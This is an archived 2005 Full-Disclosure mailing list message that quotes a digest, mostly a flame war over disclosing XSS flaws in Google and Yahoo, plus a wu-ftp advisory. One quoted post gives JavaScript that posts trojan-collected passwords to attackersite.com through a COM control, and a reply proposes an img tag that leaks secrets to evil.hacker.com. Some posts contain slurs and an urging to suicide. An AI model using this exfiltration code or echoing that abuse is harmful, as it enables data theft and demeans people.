| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed Dec 21 19:39:54 2005
From: tkrpata at bjs.com (Krpata, Tyler)
Subject: RE:DON'T SEND ME AGAIN PLS
You need to unsubscribe from the list. I was feeling kind, so I just went and put your email address into the unsubscriber. Just find and reply to the confirmation email and you'll be free from FD forever (or until you accidentally subscribe and then forget you did it again).
-----Original Message-----
From: Ahmed Aydogan [mailto:jmcboy981@...mail.com]
Sent: Wednesday, December 21, 2005 1:31 PM
To: full-disclosure@...ts.grok.org.uk
Subject: [Full-disclosure] RE:DON'T SEND ME AGAIN PLS
DON'T SEND ME AGAIN PLS
>From: full-disclosure-request@...ts.grok.org.uk
>Reply-To: full-disclosure@...ts.grok.org.uk
>To: full-disclosure@...ts.grok.org.uk
>Subject: Full-Disclosure Digest, Vol 10, Issue 70
>Date: Wed, 21 Dec 2005 18:25:14 +0000 (GMT)
>
>Send Full-Disclosure mailing list submissions to
> full-disclosure@...ts.grok.org.uk
>
>To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.grok.org.uk/mailman/listinfo/full-disclosure
>or, via email, send a message with subject or body 'help' to
> full-disclosure-request@...ts.grok.org.uk
>
>You can reach the person managing the list at
> full-disclosure-owner@...ts.grok.org.uk
>
>When replying, please edit your Subject line so it is more specific
>than "Re: Contents of Full-Disclosure digest..."
>
>
>Note to digest recipients - when replying to digest posts, please trim your
>post appropriately. Thank you.
>
>
>Today's Topics:
>
> 1. Re: XSS vulnerabilities in Google.com (Mohit Muthanna)
> 2. Alternate take on list trolls (womber)
> 3. Re: XSS vulnerabilities in Google.com (fok yo)
> 4. Re: XSS vulnerabilities in Google.com (n3td3v)
> 5. Re: new attack technique? using JavaScript+XML+OWS Post Data
> (Joachim Schipper)
> 6. SCOSA-2005.63 OpenServer 5.0.6 OpenServer 5.0.7 OpenServer
> 6.0.0 : wu-ftp Denial of Service Vulnerability (security@....com)
> 7. Re: XSS vulnerabilities in Google.com (GroundZero Security)
> 8. Re: XSS vulnerabilities in Google.com (n3td3v)
> 9. RE: XSS vulnerabilities in Google.com (Edward Pearson)
> 10. Re: XSS vulnerabilities in Google.com (GroundZero Security)
> 11. Character vulnerabilities (Peer Janssen)
> 12. Re: XSS vulnerabilities in Google.com (fok yo)
> 13. [EMED-L] Patriot Act and HIPPA (fwd) (J.A. Terranson)
> 14. Re: Firewall (The Movie) -
> http://firewallmovie.warnerbros.com/cmp/trailer.html?id=trailer
> (Slythers Bro)
> 15. Re: XSS vulnerabilities in Google.com (n3td3v)
> 16. Re: SCOSA-2005.63 OpenServer 5.0.6 OpenServer 5.0.7
> OpenServer 6.0.0 : wu-ftp Denial of Service Vulnerability (KF
>(lists))
> 17. RE: Character vulnerabilities (wilder_jeff Wilder)
> 18. Re: XSS vulnerabilities in Google.com (GroundZero Security)
> 19. Re: XSS vulnerabilities in Google.com (n3td3v)
>
>
>----------------------------------------------------------------------
>
>Message: 1
>Date: Wed, 21 Dec 2005 11:00:11 -0500
>From: Mohit Muthanna <mohit.muthanna@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID:
> <fdb3980a0512210800h13a10f20h83cab9d43942a59c@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>I thought I qualified my response well enough to prevent any
>ambiguities, but I guess I have to try again.
>
> > > Sure, but "google != howardsblog.com". A large part of the population
> > > (including myself) relies on Google's various services for day-to-day
> > > use. I sure as hell would not feel comfortable knowing that I'm using
> > > a service that can potentially leak my information.
> >
> > i'm not talking about some shitty site that noone knows, but a lof of
>big websites have
> > such vulnerabilities.
>
>And they should be disclosed. Plain and simple.
>
> > > That's quite a blanket statement to make. I'm sure a few people in the
> > > "security community" would like to know that there exists a
> > > vulnerability in a Google service.
> >
> > yeah maybe but if we end up posting about every site that offers
>services to users
> > and has xss issues then this list would be reciving a flood of mails :P
>
>That's called full-disclosure. It's the point of this list. It keeps
>(or attempts to keep) service providers, software companies, and the
>"security community" on their toes.
>
> > its not hard to test for xss, so if you are really so afraid of it go
>test it yourself and
> > notify the website owner.
>
>I don't have the time for it, nor do I care for it. I rely on this and
>other lists to keep me informed.
>
> > > No. But a site need not be audited to discover a bug.
> >
> > ah ok so you think illegal activity is the way to go ?
>
>Where did you get that impression? Let me rephrase for clarity:
>
>No it is not legal. But a bug can be discovered by other means than
>auditing. Like say, by simply using the service.
>
> > > XSS can do a lot of harm. A compromised administrator account is
> > > generally a compromised server. There are some good XSS resources on
> > > the web you can read up on.
> >
> > no as they dont rely on /etc/passwd users but have their own database
>usually
> > via mysql or so and a compromised admin user on some webinterface isnt
>always
> > going to end up in compromise of the whole server unless the admin is
>stupid
> > enough to use the same passwords for root and the webbased software.
>
>That isn't outside the realm of possibility.
>
>Again, you missed my qualifier: "generally".
>
>It is quite likely that once a determined hacker has admin priviliges
>on "some webinterface", he will eventually find a way to own the box.
>Not "always" but "quite likely".
>
>FYI, /etc/passwd is not the only way one can gain root. Larger
>services don't even use /etc/passwd.
>
>There's more than one way to skin a cat.
>
> > in most cases this will only end up in control of the web parts i.e.
>some forum.
> > i agree that this is a problem, but its still not resulting in root
>access on the shell.
>
>How do you know? Have you worked with every single web application
>that exists in the universe?
>
>In any case, even if it doesn't result in gaining root, don't you
>think that it is serious? If an XSS vulnerability was found in Flikr,
>or del.icio.us, or basecamp, or any other online service, and it lead
>to "control of the web parts", would you be comfortable using their
>services?
>
>What if they were paid services? Then does is qualify for full-disclosure?
>
> > oh and i dont have to read about it so keep your sarcasm to yourself.
>
>So then you agree that a XSS vulnerability is serious, and should be
>disclosed.
>
> > > Then, my friend, you have discovered a bug.
> >
> > mhm sure, imagine you find a DoS in your precious google, then you would
>take them
> > down and you really belive they would thank you for that ?
> > you would be raided in no time.
> > you think they would belive you that you did it only for a good cause ?
>yeah right...
>
>If I found it during the course of my using the service, sure. Why not?
>
>I've developed online services before, and I've had bugs reported.
>Contrary to what you may think, instead of "calling the feds", I try
>to fix the problem as soon as I can. I'm also glad it was reported by
>a user, as opposed to being exploited by a hacker.
>
> > > "There are 10 types of people. Those who understand binary, and those
> > > who don't."
> >
> > you dont...
>
>Very classy.
>
>--
>Mohit Muthanna [mohit (at) muthanna (uhuh) com]
>"There are 10 types of people. Those who understand binary, and those
>who don't."
>
>
>------------------------------
>
>Message: 2
>Date: Wed, 21 Dec 2005 10:13:54 -0600
>From: womber <womber@...il.com>
>Subject: [Full-disclosure] Alternate take on list trolls
>To: full-disclosure@...ts.grok.org.uk
>Message-ID:
> <5aad114b0512210813q44a28d0m236471a6251b0652@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>I know some people have stated they thought a certain list member (to
>remain nameless) is really someone doing social engineering.
>Given the type of replies recently it is starting to look to me as
>this could be possible.
>The statement "where are your yahoo or google exploits?" which keeps
>coming up makes me feel like yahoo is too cheep to check their code
>themselves or pay a firm to check, that they try to stir up security
>people to check it thoroughly because they can shove it back in a
>certain members face.
>It could also be a severe lack of social skills on that persons part.
>Just thought I would throw that out there, because it would not be
>unlike a company to avoid paying money if they do not have to.
>
>
>------------------------------
>
>Message: 3
>Date: Wed, 21 Dec 2005 17:15:10 +0100
>From: fok yo <yoo.fok@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <cd8f1f1e0512210815h145c0796v@...l.gmail.com>
>Content-Type: text/plain; charset="iso-8859-1"
>
>exactly.
>n3td3v's nothing but a pose, she's trying to be a respected security
>researcher, but she hides behind an anonymous nick. What groundbreaking
>research did n3tf4rt conduct? Nothing, still google has 68K+ hits for
>n3td3v, waste of bandwidth, storage, time.
>This is an ongoing pollution which should come to an end. Please nd, KILL
>yourself, don't even post your suicide note to fd (although that would be
>the post of the year).
>I hope google or yahoo sue n3td0rk for reverse engineering their web apps.
>Jealousy is something for 14yo girls, bitch.
>
>2005/12/21, GroundZero Security <fd@....org>:
> >
> > google or yahoo, google or yahoo ..blah go find some real bugs noone is
> > jealous of you, we just think
> > its redicilous how you try to show off with your non existing skills and
> > reputation. you are the greatest lamer
> > i'v seen on this list sofar. so instead of braging about how great you
> > are, you should actually try and learn about
> > security then soon you will realize that your xss shit is just pathetic
> > and nothing to be proud of.
> > you think finding some simple xss in a website such as yahoo or google
> > makes you superior to everyone else here ?
> > 99% of the people on this list are more skilled than you, thats fact! so
> > stop trying to show off it wont work.
> > code a double free() remote exploit, then i would agree that you have
> > skill. until you do that shut the fuck up kiddie.
> > when i started over 11 years ago, you couldnt even spell the word
> > computer. so please you should finally realize
> > that you are at the wrong place. i mean look around how many people
> > complain about you beeing annoying.
> > oh and if you couldnt figure it out by now, groundzero is my company you
> > little moron.
> > -sk
> > ----- Original Message -----
> > From: "n3td3v" <xploitable@...il.com>
> > To: "GroundZero Security" <fd@....org>;
><full-disclosure@...ts.grok.org.uk
> > >
> > Sent: Wednesday, December 21, 2005 4:26 PM
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> >
> > > Your argument for having Google and Yahoo vulnerabilities (especially
> > > XSS) banned from FD is very poor. GroundZero or whoever you may be.
> > > Please get off the list and stop disrespecting others who do disclose
> > > vulnerabilities in Google And Yahoo
> > >
> > > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > >
> > > > > Sure, but "google != howardsblog.com". A large part of the
> > population
> > > > > (including myself) relies on Google's various services for
> > day-to-day
> > > > > use. I sure as hell would not feel comfortable knowing that I'm
> > using
> > > > > a service that can potentially leak my information.
> > > >
> > > > i'm not talking about some shitty site that noone knows, but a lof
>of
> > big websites have
> > > > such vulnerabilities.
> > > >
> > > > > That's quite a blanket statement to make. I'm sure a few people in
> > the
> > > > > "security community" would like to know that there exists a
> > > > > vulnerability in a Google service.
> > > >
> > > > yeah maybe but if we end up posting about every site that offers
> > services to users
> > > > and has xss issues then this list would be reciving a flood of mails
> > :P
> > > > its not hard to test for xss, so if you are really so afraid of it
>go
> > test it yourself and
> > > > notify the website owner.
> > > >
> > > > > No. But a site need not be audited to discover a bug.
> > > >
> > > > ah ok so you think illegal activity is the way to go ?
> > > > you cant just audit any site you want you know, but hey
> > > > if you want to get a visit from the feds why dont you audit some
> > gov/mil i'm sure
> > > > there are lots of xss to discover :P
> > > >
> > > > > XSS can do a lot of harm. A compromised administrator account is
> > > > > generally a compromised server. There are some good XSS resources
>on
> > > > > the web you can read up on.
> > > >
> > > > no as they dont rely on /etc/passwd users but have their own
>database
> > usually
> > > > via mysql or so and a compromised admin user on some webinterface
>isnt
> > always
> > > > going to end up in compromise of the whole server unless the admin
>is
> > stupid
> > > > enough to use the same passwords for root and the webbased software.
> > > > in most cases this will only end up in control of the web parts i.e.
> > some forum.
> > > > i agree that this is a problem, but its still not resulting in root
> > access on the shell.
> > > > oh and i dont have to read about it so keep your sarcasm to
>yourself.
> > > >
> > > > > Then, my friend, you have discovered a bug.
> > > >
> > > > mhm sure, imagine you find a DoS in your precious google, then you
> > would take them
> > > > down and you really belive they would thank you for that ? you would
> > be raided in no time.
> > > > you think they would belive you that you did it only for a good
>cause
> > ? yeah right...
> > > >
> > > >
> > > > > "There are 10 types of people. Those who understand binary, and
> > those
> > > > > who don't."
> > > >
> > > > you dont...
> > > >
> > > >
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in it.
> > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia - http://secunia.com/
> > > >
> > >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>-------------- next part --------------
>An HTML attachment was scrubbed...
>URL:
>http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051221/93347fab/attachment-0001.html
>
>------------------------------
>
>Message: 4
>Date: Wed, 21 Dec 2005 16:21:01 +0000
>From: n3td3v <xploitable@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>,
> full-disclosure@...ts.grok.org.uk
>Message-ID:
> <4b6ee9310512210821j7a5e8484l7253cf5de1a159fe@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>On 12/21/05, GroundZero Security <fd@....org> wrote:
> > google or yahoo, google or yahoo
>
>Google and Yahoo is my specialized subject as is corporate security as
>a whole, don't be suprised if Google and Yahoo come up, they're the
>biggest of the biggest out there on the landscape.
>
> > its redicilous how you try to show off with your non existing skills and
>reputation. you are the greatest lamer
>
>You're very sure I don't have any skills?
>
> > you think finding some simple xss in a website such as yahoo or google
>makes you superior to everyone else here ?
>
>You must be thinking thats all I find ;-)
>
> > 99% of the people on this list are more skilled than you, thats fact! so
>stop trying to show off it wont work.
>
>You're not one of them, be off with you
>
> > code a double free() remote exploit, then i would agree that you have
>skill. until you do that shut the fuck up kiddie.
>
>Using profanity against those with more Google and Yahoo
>vulnerabilities than you won't help you become better
>
> > when i started over 11 years ago, you couldnt even spell the word
>computer. so please you should finally realize
> > that you are at the wrong place. i mean look around how many people
>complain about you beeing annoying.
> > oh and if you couldnt figure it out by now, groundzero is my company you
>little moron.
>
>11 years, and hi-jacking legitmate dislclosures like this one? You've
>learned alot. God forbid you, if you really do own a security company.
>
>
>------------------------------
>
>Message: 5
>Date: Wed, 21 Dec 2005 17:36:04 +0100
>From: Joachim Schipper <j.schipper@...h.uu.nl>
>Subject: Re: [Full-disclosure] new attack technique? using
> JavaScript+XML+OWS Post Data
>To: full-disclosure@...ts.grok.org.uk
>Message-ID: <20051221163604.GC23202@...pomene.jschipper.dynalias.net>
>Content-Type: text/plain; charset=us-ascii
>
>On Wed, Dec 21, 2005 at 08:58:30PM +0530, Gaurav Kumar wrote:
> > While researching COM related security vulnerabilities I thought of
> > this possible attack technique, not sure if it has been discussed
> > before.
> >
> >
> > Problem/challenge statement:
> >
> > A Trojan has been to be placed in a system running an application
> > firewall like Zone Alarm Pro etc. The Trojan is not allowed to make
> > any outbound connections. The challenge is to send data (key logged
> > passwords etc) back to the attacker.
>
> > Solution
> >
> > The Trojan can be designed to generate an xml file which will contain
> > the data to be sent out. The attacker will lure the user to visit a
> > website hosted by him. The site can have following HTML code-
> >
> > <html>
> > <body>
> > The author is not responsible for any misuse, this PoC is for
> > educational purpose only.
> > <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> > id="exp">
> > </object>
> > <script LANGUAGE=javascript>
> > var xmlDoc
> > xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> > xmlDoc.async=false;
> > xmlDoc.load("c:\\note.xml");
> > xmlObj=xmlDoc.documentElement;
> > var a= xmlObj.firstChild.text;
> > exp.Post(0,"http://www.attackersite.com/input.asp",a);
> > </script>
> > </body>
> > </html>
> >
> > Content of note.xml could be ?
> >
> > <password>secret</password>
> >
> >
> > The above code (works well on windows XP SP2) essentials calls "OWS
> > Post Data" COM control to post the contents of note.xml (generated by
> > trojan) to attackersite.com
> >
> > Essentially, the technique is breaking the basic functionality of
> > application firewalls by using OWS Post Data as bridge for sending out
> > the data using Javascript and XML.
>
> > flames/spam/abuse etc can be sent to spam@...urebox.org
> > comments can be sent to gaurav@...urebox.org
>
>I'll just assume you read the list.
>
>I'm not an expert, but I don't recall ever seeing this particular
>implementation. Then again, there are easier ways to go about this - for
>instance, how about embedding a <img
>src="http://evil.hacker.com/callback/ThisIsMyVerySecretPassWord" width=1
>height=1> tag into an arbitrary HTML file? It works on any graphical
>browser without special protection.
>
>Search the archives for some more neat tricks - calling the proper APIs,
>IE can be used to send out pretty much arbitrary data. [1]
>
>If you're willing to attack ZA specifically (instead of a generic
>application/-based firewall, of which there are many) just use the
>Windows API to generate the proper mouse clicks/keypresses.
>
> Joachim
>
>[1] Some would say that, calling the 'proper' APIs, IE can be used to
>send *in* pretty much arbitrary data too. I'd be inclined to agree.
>
>
>------------------------------
>
>Message: 6
>Date: Wed, 21 Dec 2005 11:34:42 -0500 (EST)
>From: security@....com
>Subject: [Full-disclosure] SCOSA-2005.63 OpenServer 5.0.6 OpenServer
> 5.0.7 OpenServer 6.0.0 : wu-ftp Denial of Service Vulnerability
>To: security-announce@...t.sco.com
>Message-ID: <Pine.UW2.4.63.0512211134040.11687@...d.nj.sco.com>
>Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>______________________________________________________________________________
>
> SCO Security Advisory
>
>Subject: OpenServer 5.0.6 OpenServer 5.0.7 OpenServer 6.0.0 : wu-ftp
>Denial of Service Vulnerability
>Advisory number: SCOSA-2005.63
>Issue date: 2005 December 21
>Cross reference: sr893936 fz532335 erg712856
> sr895049 fz533027 erg712952
> CVE-2005-0256
>______________________________________________________________________________
>
>
>1. Problem Description
>
> The wu_fnmatch function in wu_fnmatch.c allows remote attackers
> to cause a denial of service (CPU exhaustion by recursion) via a
> glob pattern with a large number of * (wildcard) characters, as
> demonstrated using the dir command.
>
> The Common Vulnerabilities and Exposures project (cve.mitre.org)
> has assigned the following name CVE-2005-0256 to this issue.
>
>
>2. Vulnerable Supported Versions
>
> System Binaries
> ----------------------------------------------------------------------
> OpenServer 5.0.6 /etc/ftpd
> OpenServer 5.0.7 /etc/ftpd
> OpenServer 6.0.0 /etc/ftpd
>
>
>3. Solution
>
> The proper solution is to install the latest packages.
>
>
>4. OpenServer 5.0.6
>
> 4.1 Location of Fixed Binaries
>
> ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63
>
>
> 4.2 Verification
>
> MD5 (p532335.506_vol.tar) = 89ea2ed1f88da6721bd73c3889f9ac0c
>
> md5 is available for download from
> ftp://ftp.sco.com/pub/security/tools
>
>
> 4.3 Installing Fixed Binaries
>
> The following package should be installed on your system before you
> install this fix:
>
> OSS646C
>
> Upgrade the affected binaries with the following sequence:
>
> 1) Download p532335.506_vol.tar to a directory.
>
> 2) Extract VOL* files.
>
> # tar xvf p532335.506_vol.tar
>
> 3) Run the custom command, specify an install
> from media images, and specify the directory as
> the location of the images.
>
>
>5. OpenServer 5.0.7
>
> 5.1 Location of Fixed Binaries
>
> The fixes are only available in SCO OpenServer Release 5.0.7
> Maintenance Pack 4 or later.
>
> ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4_vol.tar
>
>
> 5.2 Verification
>
> MD5 (osr507mp4_vol.tar) = 4c87d840ff5b43221258547d19030228
>
> md5 is available for download from
> ftp://ftp.sco.com/pub/security/tools
>
>
> 5.3 Installing Fixed Binaries
>
> See the SCO OpenServer Release 5.0.7 Maintenance Pack 4 Release
> and Installation Notes:
>
> ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm
>
>
>6. OpenServer 6.0.0
>
> 6.1 Location of Fixed Binaries
>
> ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63
>
>
> 6.2 Verification
>
> MD5 (p533027.600_vol.tar) = d939cb729d115c9bef2d2032903f2125
>
> md5 is available for download from
> ftp://ftp.sco.com/pub/security/tools
>
>
> 6.3 Installing Fixed Binaries
>
> Upgrade the affected binaries with the following sequence:
>
> 1) Download p533027.600_vol.tar to a directory.
>
> 2) Extract VOL* files.
>
> # tar xvf p533027.600_vol.tar
>
> 3) Run the custom command, specify an install
> from media images, and specify the directory as
> the location of the images.
>
>
>7. References
>
> Specific references for this advisory:
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0256
>
> http://www.idefense.com/application/poi/display?id=207&type=vulnerabilities
>
> SCO security resources:
> http://www.sco.com/support/security/index.html
>
> SCO security advisories via email
> http://www.sco.com/support/forums/security.html
>
> This security fix closes SCO incidents sr893936 fz532335
> erg712856 sr895049 fz533027 erg712952.
>
>
>8. Disclaimer
>
> SCO is not responsible for the misuse of any of the information
> we provide on this website and/or through our security
> advisories. Our advisories are a service to our customers
> intended to promote secure installation and use of SCO
> products.
>
>
>9. Acknowledgments
>
> SCO would like to thank Adam Zabrocki.
>
>______________________________________________________________________________
>-----BEGIN PGP SIGNATURE-----
>Version: GnuPG v1.4.2 (UnixWare)
>
>iD8DBQFDqYDTaqoBO7ipriERAtzOAJ0ctD8xRYQrLkkgyHsMqCvfQdPBFQCeIgx7
>xqqmzQCNiw6t+WtSL5rqo4E=
>=ha4X
>-----END PGP SIGNATURE-----
>
>
>------------------------------
>
>Message: 7
>Date: Wed, 21 Dec 2005 17:57:31 +0100
>From: "GroundZero Security" <fd@....org>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: "php0t" <php0t@...ro.hu>
>Cc: full-disclosure@...ts.grok.org.uk
>Message-ID: <017001c6064f$a4617030$0100a8c0@...learwinter>
>Content-Type: text/plain; charset="iso-8859-1"
>
>yes you are right, but its like if noone tells him what a stupid fag he is,
>he will keep posting and posting his irrelevant crap and just ignore the
>tons of private
>mail he receives. i'm sorry for adding to the noise, but its just too
>tempting.
>i try to ignore it. but i cant promise i will, the last mail he sent just
>asks for a reply :P
>but ok...must...resist.....
>btw my name is not groundzero, thats my company :)
>
>greetz
>-sk
>Http://www.groundzero-security.com
>
>----- Original Message -----
>From: "php0t" <php0t@...ro.hu>
>To: "'GroundZero Security'" <fd@....org>
>Sent: Wednesday, December 21, 2005 5:06 PM
>Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.com
>
>
> >
> > hi, groundzero.
> >
> > I agree whole heartedly and the dood pisses me off too, just like
> > everybody else.
> >
> > On the other hand, seeing him repeat google/yahoo again and again all
> > the time and seeing the obvious-to-come replies makes my email alert
> > fuck the mp3's up I'm listening to too often.
> >
> > My idea is this: how'bout each time the guy posts something
> > ridiculous, all of us who are grasping our heads tearing our last pieces
> > of hair out thniking to ourselves 'omfgwtfd00d' just write him a private
> > email containing talk-to-the-hand or something? This would achieve two
> > things: 1) less noise on the list 2) instead of being able to reply
> > endlessly with bullcrap to the thread, he would just have to deal with
> > nobody giving a fuck about him in public, still 10 emails saying 'I
> > don't care' whenever he makes a post.
> >
> > Tell me if you think this sucks, it's just an idea.
> >
> > Php0t
> >
> >
> >
> >
> > -----Original Message-----
> > From: full-disclosure-bounces@...ts.grok.org.uk
> > [mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of
> > GroundZero Security
> > Sent: Wednesday, December 21, 2005 4:54 PM
> > To: n3td3v
> > Cc: full-disclosure@...ts.grok.org.uk
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> >
> > google or yahoo, google or yahoo ..blah go find some real bugs noone is
> > jealous of you, we just think
> > its redicilous how you try to show off with your non existing skills and
> > reputation. you are the greatest lamer i'v seen on this list sofar. so
> > instead of braging about how great you are, you should actually try and
> > learn about security then soon you will realize that your xss shit is
> > just pathetic and nothing to be proud of. you think finding some simple
> > xss in a website such as yahoo or google makes you superior to everyone
> > else here ? 99% of the people on this list are more skilled than you,
> > thats fact! so stop trying to show off it wont work. code a double
> > free() remote exploit, then i would agree that you have skill. until you
> > do that shut the fuck up kiddie. when i started over 11 years ago, you
> > couldnt even spell the word computer. so please you should finally
> > realize that you are at the wrong place. i mean look around how many
> > people complain about you beeing annoying. oh and if you couldnt figure
> > it out by now, groundzero is my company you little moron. -sk
> > ----- Original Message -----
> > From: "n3td3v" <xploitable@...il.com>
> > To: "GroundZero Security" <fd@....org>;
> > <full-disclosure@...ts.grok.org.uk>
> > Sent: Wednesday, December 21, 2005 4:26 PM
> > Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
> >
> >
> > > Your argument for having Google and Yahoo vulnerabilities (especially
> > > XSS) banned from FD is very poor. GroundZero or whoever you may be.
> > > Please get off the list and stop disrespecting others who do disclose
> > > vulnerabilities in Google And Yahoo
> > >
> > > On 12/21/05, GroundZero Security <fd@....org> wrote:
> > > >
> > > > > Sure, but "google != howardsblog.com". A large part of the
> > > > > population (including myself) relies on Google's various services
> > > > > for day-to-day use. I sure as hell would not feel comfortable
> > > > > knowing that I'm using a service that can potentially leak my
> > > > > information.
> > > >
> > > > i'm not talking about some shitty site that noone knows, but a lof
> > > > of big websites have such vulnerabilities.
> > > >
> > > > > That's quite a blanket statement to make. I'm sure a few people in
> >
> > > > > the "security community" would like to know that there exists a
> > > > > vulnerability in a Google service.
> > > >
> > > > yeah maybe but if we end up posting about every site that offers
> > > > services to users and has xss issues then this list would be
> > > > reciving a flood of mails :P its not hard to test for xss, so if you
> >
> > > > are really so afraid of it go test it yourself and notify the
> > > > website owner.
> > > >
> > > > > No. But a site need not be audited to discover a bug.
> > > >
> > > > ah ok so you think illegal activity is the way to go ?
> > > > you cant just audit any site you want you know, but hey
> > > > if you want to get a visit from the feds why dont you audit some
> > > > gov/mil i'm sure there are lots of xss to discover :P
> > > >
> > > > > XSS can do a lot of harm. A compromised administrator account is
> > > > > generally a compromised server. There are some good XSS resources
> > > > > on the web you can read up on.
> > > >
> > > > no as they dont rely on /etc/passwd users but have their own
> > > > database usually via mysql or so and a compromised admin user on
> > > > some webinterface isnt always going to end up in compromise of the
> > > > whole server unless the admin is stupid enough to use the same
> > > > passwords for root and the webbased software. in most cases this
> > > > will only end up in control of the web parts i.e. some forum. i
> > > > agree that this is a problem, but its still not resulting in root
> > > > access on the shell. oh and i dont have to read about it so keep
> > > > your sarcasm to yourself.
> > > >
> > > > > Then, my friend, you have discovered a bug.
> > > >
> > > > mhm sure, imagine you find a DoS in your precious google, then you
> > > > would take them down and you really belive they would thank you for
> > > > that ? you would be raided in no time. you think they would belive
> > > > you that you did it only for a good cause ? yeah right...
> > > >
> > > >
> > > > > "There are 10 types of people. Those who understand binary, and
> > > > > those who don't."
> > > >
> > > > you dont...
> > > >
> > > >
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in it.
> > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia - http://secunia.com/
> > > >
> > >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>------------------------------
>
>Message: 8
>Date: Wed, 21 Dec 2005 17:16:54 +0000
>From: n3td3v <xploitable@...il.com>
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>To: GroundZero Security <fd@....org>,
> full-disclosure@...ts.grok.org.uk
>Message-ID:
> <4b6ee9310512210916h66104d21n484173a514c0d57e@...l.gmail.com>
>Content-Type: text/plain; charset=ISO-8859-1
>
>You trolled this thread by saying Watchfire should stop disclosing
>vulnerabilities for Yahoo and Google. You get the response you
>deserved to get. Now you're running off the thread now with your tail
>between your legs, because everyone has told you that Google and Yahoo
>vulnerabilities (especially XSS) will never be banned from FD.
>
>
>On 12/21/05, GroundZero Security <fd@....org> wrote:
> > yes you are right, but its like if noone tells him what a stupid fag he
>is,
> > he will keep posting and posting his irrelevant crap and just ignore the
>tons of private
> > mail he receives. i'm sorry for adding to the noise, but its just too
>tempting.
> > i try to ignore it. but i cant promise i will, the last mail he sent
>just asks for a reply :P
> > but ok...must...resist.....
> > btw my name is not groundzero, thats my company :)
> >
> > greetz
> > -sk
>
>
>------------------------------
>
>Message: 9
>Date: Wed, 21 Dec 2005 17:41:14 -0000
>From: "Edward Pearson" <Ed@...tymail.co.uk>
>Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.com
>To: <full-disclosure@...ts.grok.org.uk>
>Message-ID:
> <4DB4124FD67F9745B9E09DADDC297467724292@...tydc.unity1.local>
>Content-Type: text/plain; charset="us-ascii"
>
>Why has this become a trolling?
>"if noone tell him what a stupid fag he is"
>Are we back at fucking middle school? Have we decended to the level of
>10 year olds??
>
>Ground Zero, I've seen your company website(s) and your products. All I
>say is I think you have several very good resons to pay FUCKING close
>attention to what is said on this list. Work it out.
>
>The only people who seem hell bent on ruining this list for everyone
>are:
>InfoSecBOFH
>n3td3v
>Ground Zero Security
>
>None of these people have anything to bring to the table.
>Lets see at least one real vuln report/exploit from one of you, and then
>the other two have to concentrate on growing up enough to not troll it
>or make stupid pre-school comments.
>
>Come on guys!!! I'm beginning to thing that actually you're not bigger
>than this...
>
>Ultimatly, if you've got problems with each other, do it on MSN, AIM,
>IRC, USENET whatever, just not my inbox.
>
>Have a fucking excellent day.
>
>- Ed (BTW, Ground Zero's has my alais since 1995, now I see that this
>chump is going round putting a black mark by it)
>
>-----Original Message-----e
>From: full-disclosure-bounces@...ts.grok.org.uk
>[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of n3td3v
>Sent: 21 December 2005 17:17
>To: GroundZero Security; full-disclosure@...ts.grok.org.uk
>Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
>
>You trolled this thread by saying Watchfire should stop disclosing
>vulnerabilities for Yahoo and Google. You get the response you deserved
>to get. Now you're running off the thread now with your tail between
>your legs, because everyone has told you that Google and Yahoo
>vulnerabilities (especially XSS) will never be banned from FD.
>
>
>On 12/21/05, GroundZero Security <fd@....org> wrote:
> > yes you are right, but its like if noone tells him what a stupid fag
> > he is, he will keep posting and posting his irrelevant crap and just
> > ignore the tons of private mail he receives. i'm sorry for adding to
>the noise, but its just too tempting.
> > i try to ignore it. but i cant promise i will, the last mail he sent
> > just asks for a reply :P but ok...must...resist.....
> > btw my name is not groundzero, thats my company :)
> >
> > greetz
